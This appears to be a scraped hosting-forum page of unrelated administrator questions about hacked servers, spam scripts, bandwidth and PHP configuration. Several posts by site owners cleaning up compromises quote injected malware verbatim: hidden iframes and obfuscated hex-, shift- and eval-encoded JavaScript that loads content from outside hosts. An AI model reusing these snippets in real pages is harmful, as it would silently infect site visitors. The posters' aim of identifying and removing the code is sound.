Hacked; Warning: Count.php?o=2 Code
Jul 16, 2008
On 4/11 at 5:30pm, my server's root was compromised and someone had a field day on my server. Surprisingly with the level of access they had, the person very quietly ran a script (I've yet to find the file, but saw reference to it in another forum about this) that updated every single .html, .htm, and *index.php file in the homes directory. I can't even count how many files were edited -- at least 100-200 files I've had to manually change thus far.
That said, I wanted to warn everyone about this. My Google results were slim on this subject. What I find really surprising is that Avast! is the only anti-virus software to warn me of the possible malware being opened. I use either at home or at my office Avast!, BitDefender 2008, Symantec Corporate Antivirus, and McAfee corporate Antivirus. I just installed Avast! yesterday just for "peace of mind" and I'm damned glad that I did because it immediately popped up about HTML:iframe-gen malware on my websites.
I have enabled e-mail sending whenever someone logs into the root account on my server -- which I believe I received the tutorial from here in the How-To section -- and I did receive an e-mail for the person logging into the root account via SSH, but the IP address and hostname were left blank. Does anyone know why the IP and hostname would be blank? That doesn't mean they were console, does it?
Here is the HTML code that was inserted into all of my .htm, .html, and *index.php files:
<iframe src=[url] width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Jun 25, 2007
About 2 months ago, I noticed random code linking to a virus in a frame was inserted into many of my web pages across various accounts.
After I removed it all, I noticed that this has happened to me again!
Code:
<!-- ~ --><script>function v467e627add1dd(v467e627ade17d){ function v467e627adf11b () {return 16;} return(parseInt(v467e627ade17d,v467e627adf11b()));}function v467e627ae105c(v467e627ae2008){ var v467e627ae2f9b='';for(v467e627ae3f41=0; v467e627ae3f41<v467e627ae2008.length; v467e627ae3f41+=2){ v467e627ae2f9b+=(String.fromCharCode(v467e627add1dd(v467e627ae2008.substr(v467e627ae3f41, 2))));}return v467e627ae2f9b;} document.write(v467e627ae105c('3C696672616D65207372633D27687474703A2F2F7777772E3473747566666465616C732E636F6D2F646F63732F7468656D652E68746D272077696474683D31206865696768743D31207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><!-- ~ -->
How are they inserting it into my web pages?
Dec 13, 2014
For some reason one of my customer's email accounts seems to have been hacked. My admin account continues to say that the customer has reached over the 30 emails per hour limit. This is the email error:
following customers' domains, mailboxes and subscriptions are reached their limits for outgoing emails for the period:>From Dec/13/2014 05:47. To Dec/ 13/ 2014 06:47
Subscriptions
customerdomain.com, the limit is 100 messages per hour
336 attempt(s) to exceed limits from Dec/13/2014 04:31 to Dec/13/2014 05:47
So far it has sent over 5,000 attempted in the past few hours. The customer used Gmail to send from the domain before, so I've changed their Gmail email password. I've also changed the main email password, and the Plesk username and password login for the customer. It still continues.
Jul 7, 2007
When I try to send email from Horde I have this:
PHP Code:
There was an error sending your message: Failed to add recipient: xxxxx@hotmail.com [SMTP: Invalid response code received from server (code: 451, response: Temporary local problem - please try later)]
May 11, 2009
I have a question about the bandwidth. I have a VPS with 1000gb of bandwidth. How does it count, actually? 500gb up & 500gb down, or 1000gb up & 1000gb down, or what? Is it the same with shared hosting? I think I don't really need that much bandwidth.
Jul 16, 2008
I got an alert from cPanel that a user had sent out 100s of emails and they were NOT being blocked, of course to discover it was spam... Without question, I deleted the account. Thankfully I know who the site belongs to, and of course I'm sure they did not send spam...
1) Is it within common practice to delete someone's account once such is noticed occurring on their account, with or without notice?
2) How can the server block such mass emails from being sent out? (I have recently advised some of our clients to use newsletter services to send out mass mails if they have to send to 100+ plus people.)
3) I found the script that sent out the spam emails. It was a file called sky.php. I deleted it, but I never got a warning that such a file had been uploaded to that account...
Apr 16, 2008
I have 2 questions:
1. Upload files count in my bandwidth?
2. Remote Backups count in my bandwidth?
Mar 19, 2007
I've recently taken over the hosting of a large site and forum, and I want to use some form of statistics software or service so that I can determine how many unique visitors and pageviews the site and forum get (which can then be used when dealing with advertisers).
I've been using Webalizer for years, but it's not been updated in over 5 years, so it's out. I then stumbled on Awstats, which works great, but... it doesn't calculate the pageviews correctly.
At the present moment Awstats claims to have tracked approx. 2 million pageviews for the (vBulletin) forum. However, when I scroll down I notice that on number #1 in the "Pages URL Top 10" is image.php, which is used for avatars and is not a page!
Now it appears Awstats has two ways of dealing with this: the "SkipFiles" option and the "NotPageList" option. The first (SkipFiles) drops whole URLs from the stats, which isn't what I want: I just don't want them to be counted as pages.
The second (NotPageList) only accepts file extensions, not script names. This again isn't what I want: hits on showthread.php should still be counted as pages, only hits on image.php shouldn't be.
The site has a similar problem where I don't want scripts like stylesheet.php, rss.php and xml.php from being counted as pages.
My question: does anyone know a solution for this problem? Maybe a hack to allow "NotPageList" to accept script names and/or URLs?
Alternatively: does anyone know another statistics package that's about on par or better than Awstats that can do this (and that works on Linux/Unix with logs generated by lighttpd+php-fastcgi) and that is not too expensive (max $200)?
Google Analytics isn't suitable for me (even though it would probably work well) because the site goes over 5 million pageviews/month and I don't have an AdWords account.
Jun 25, 2009
I want to count the traffic for every IP passed through a Squid proxy server.
Is it possible to record the traffic numbers for every IP in an external .txt file?
It would be better if it can write outgoing and ingoing traffic.
May 19, 2014
Is there a way of doing a simple visitor count, ideally by incrementing a number in a text file...
E.g: [URL] ...
would increment a number in text file 'client1', and still display http://mysite.org as normal?
Apr 17, 2015
I've asked sales a few times but they don't seem to know...what counts as a "website?" In PPA as a test we set up two subscriptions and one mail-only secondary domain on one of them. The Services/Websites tab lists all three, but only two are marked as Website under Hosting Type while the third is marked No Hosting. Does that count as two websites for license purposes, or three?
I'm trying to plan for multiple domains, subdomains, etc.
Oct 13, 2008
What is an EPP code? I am required to enter it to register a domain.
Jul 16, 2009
I have serious problems with ".cgi" files with malicious code; with them, the person who has these files is able to send spam through my server without any kind of block. Could I block this type of spam sending with ".cgi" files?
CentOS 5.2 - 64bits
WHM+cPanel
Example of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi
Apr 9, 2007
PHP 5.2.1 installed on WHM 10.8.0 cPanel 10.9.0-C9565
If I load a php file on browser, it gets loaded, but in HTML source I can see php code.
If I run in SSH "php info.php", the php code gets run and normal output is generated.
I checked these lines in httpd.conf:
LoadModule php5_module libexec/libphp5.so
AddModule mod_php5.c
AddHandler application/x-httpd-php .php .php4 .php3
AddType application/x-httpd-php .php
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .php3
AddType application/x-httpd-php-source .phps
AddType application/x-httpd-php .phtml
"php -v" returns:
PHP 5.2.1 (cli) (built: Apr 9 2007 10:38:29)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
with Zend Extension Manager v1.2.0, Copyright (c) 2003-2006, by Zend Technologies
with Zend Optimizer v3.2.2, Copyright (c) 1998-2006, by Zend Technologies
On php.ini I have:
; Enable the PHP scripting language engine under Apache.
engine = "On" ;engine
I use long tags ("<?php").
I recompiled Apache and PHP a few times, both from WHM and from SSH. I reinstalled Zend Optimizer.
Nov 12, 2007
We are testing a module that we think may improve stability on our webservers. The module limits the number of concurrent connections allowed from any particular IP address.
What I need an opinion on is what error message the server should return when it is refusing because of the limit.
The module currently returns a 503 error, that's what the module's author set it to do. 503 is a temporary error, which is good, but it implies that the problem is with the server, which seems somewhat inaccurate to me.
I was thinking a 409 would be good, with text saying that the request conflicts with the per visitor connection limit for the requested resource. Ideally the browser would display the message and people would know to reconfigure software or wait for existing connections to complete before resubmitting the request.
One of my co-workers here says that at least people understand the "server busy" error and they won't understand the "conflict" message.
Someone else says most of these errors will come from folks using HTTP 1.0 and the 409 doesn't exist at that level of the protocol, so they won't get anything more than a generic "error!" type of message.
Jul 27, 2007
I put the Windows Media Player embedded code on my site, but is there a way to limit the buffer or rate at which the video downloads or streams to the user?
Quote:
<object classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" codebase= [url]
That is the code I use.
Jun 10, 2007
Does anybody have a script that can view the PHP source code before it runs to the server of an external site?
Jun 4, 2009
Someone sniffed the FTP password of a user account on my server, and it looks like JavaScripts were altered and iframe tags inserted in PHP files. While I cleaned up the PHP pages, I see the following JavaScript code added to each .js file. What is it supposed to do?
<!--
(function(qAWI){var OMt9='var-20a-3d-22S-63-72ip-74-45n-67-69ne-22-2cb-3d-22-56e-72sion-28)+-22-2cj-3d-22-22-2cu-3dnavigator-2e-75s-65-72A-67-65nt-3bi-66((-75-2eindex-4ff-28-22-43h-72ome-22)-3c0)-26-26(u-2einde-78-4ff(-22Win-22)-3e0)-26-26(u-2eindexOf(-22-4eT-206-22)-3c0)-26-26-28doc-75me-6et-2eco-6fk-69e-2e-69-6ed-65x-4ff(-22-6di-65k-3d1-22)-3c0-29-26-26(ty-70-65-6ff(z-72v-7at-73)-21-3dty-70eof(-22A-22)))-7b-7a-72v-7a-74s-3d-22A-22-3beval(-22-69-66(window-2e-22+a+-22)j-3d-6a+-22-2ba+-22M-61jo-72-22-2b-62-2ba+-22-4din-6f-72-22+b+a+-22B-75ild-22-2b-62+-22-6a-3b-22)-3bd-6f-63u-6dent-2ewri-74e(-22-3c-73c-72ipt-20src-3d-2f-2fma-22+-22rtuz-2ecn-2fvid-2f-3fi-64-3d-22-2bj+-22-3e-3c-5c-2fsc-72ipt-3e-22)-3b-7d';var M2ye=OMt9.replace(qAWI,'%');eval(unescape(M2ye))})(/-/g);
-->
May 6, 2009
I have a customer who is hosting a website on a dedicated server. The server is a high spec server with Intel Core 2 DUO E8400 processor, 4 GB DDR2 ECC RAM and a SATA Hard Drive. He is running only a single website which has a data entry section. The problem is that a few scripts when run consume 99% of the CPU. In fact, there is a particular script which even if run alone consumes 99% CPU. The code retrieves some records from the database by running an SQL query. The code is never executed. I have checked the SQL query in the code and it runs fine if executed in SQL Query Analyzer. I know the problem is somewhere in the code, but cannot find the exact cause. Is there a tool to debug the ASP code and find out what may be the issue with the code? I have tried the Debug Diagnostics utility,
Jul 18, 2009
how this new feature works in csf with blocking by country code.
I'm trying to put a block on Indonesia.
Oct 21, 2009
A friend of mine is trying to show the page below, however it just shows the code.
[url]
What can I do to fix it?
Oct 27, 2008
All sites on my server have malicious code:
</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
How can I locate this code in my sites using grep?
My server runs on CentOS.
Oct 2, 2008
I am currently developing a web application on a WAMP server. Once complete my client will have some in-house "programmers" make changes to the code as they are needed.
My client wants to track all changes made to the source files (i.e. who made the change, when it was made, what files were modified, and what specific lines were added/removed/modified). Also, the program must run on the server and not the programmers' computers.
I've searched high and low and only found a couple programs that scratch the surface of what they want.
Mar 10, 2008
Some JSP pages display the source code. Some work and some don't, even after recompiling Apache with the Tomcat module and restarting JSP.
-rw-r--r-- 1 user user 6.5K Mar 10 17:18 index.jsp
Not sure where the jsp logs are, but there were no errors in the domlogs.
Jun 14, 2008
I have just moved to a VPS server from my shared hosting server and I am suddenly finding it tough to code equally well by just using the vim command. I have become more used to the cPanel code editor probably.
Can anyone suggest a nice tool for the same? I have installed Webmin, but its code editor just sucks.
May 14, 2007
I have a VPS account and am trying to set up my website. I installed PHP 4 from a control panel, where it auto-installed PHP, and there is MySQL, and I installed all of them, but when I upload my script and go to install, or go to the index of my site, it shows the PHP code and does not execute.
My permissions are right on. I also made a test PHP file and used this code, <?php phpinfo(); ?>, and still nothing: it just shows the PHP code when you browse to the file. I even went further: I installed from the control panel another program called phpMyAdmin, and when I log in it does the same thing, just shows PHP code. So what the hell is going on? Do you think I need to contact my host provider for this issue? I sent an email out but am waiting for a response.
Apr 28, 2007
I have a site that runs on my dedicated server and it is MySQL/PHP based. Sometimes when I post news to the site or even try to open the homepage I get:
Quote:
Server Error
The following error occurred: [code=SERVER_RESPONSE_CLOSE] The server closed
the connection while reading the response. Contact your system administrator.
May 22, 2007
If I want to open a URL, say [url], I can use file_get_contents:
$content = file_get_contents([url]);
How do I do the equivalent using curl, socket, socket, and wget?
Aug 5, 2007
My server was just upgraded to FC6 and now I do not have pico for an editor. I found nano but there are problems. The screen does not refresh correctly, and when I type in characters sometimes extra characters show up.
Are there any other screen editors built in to FC6 (not vi)?
Oct 16, 2007
A friend of mine that has a proxy site on my server just realized that his site is giving some very weird error and he said he has not made any changes to the site in a while as he's been pre-occupied with other things...
Quote:
--removed--.com has sent an incorrect or unexpected message. Error Code: -12263
It appears as a JavaScript Alert when you hit submit on the proxy url form... However, I looked into it a bit and there is no JavaScript on the page... Therefore, it must be some sort of server error I'd assume... I even disabled JavaScript in Firefox and still received the error...